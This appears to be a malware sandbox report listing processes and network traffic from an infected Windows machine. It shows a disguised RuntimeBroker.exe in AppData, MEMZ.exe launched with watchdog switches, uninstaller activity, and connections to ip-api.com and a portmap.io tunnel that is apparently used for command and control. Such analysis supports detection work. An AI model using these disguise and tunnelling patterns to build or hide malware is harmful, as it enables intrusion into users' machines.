"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1696 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2080 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4268 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4408 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4688 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4540 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4752 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4432 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3224 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3500 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2724 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2692 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2684 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,7107584080324159068,5216414792150567580,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5356 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1884,i,13071793552152944592,910346315089759456,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=1484 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3380 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5152 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5204 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=3040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4740 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5344 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5236 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5544 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5756 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4168 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5040 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=5636 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /main

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" \note.txt

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 77CD4EEA0315166438CDB2DBA3B1B727

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

C:\Windows\SYSTEM32\MsiExec.exe

MsiExec.exe /X{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 sebeee-39917.portmap.io udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
US 8.8.8.8:53 99.193.161.193.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
DE 193.161.193.99:39917 sebeee-39917.portmap.io tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
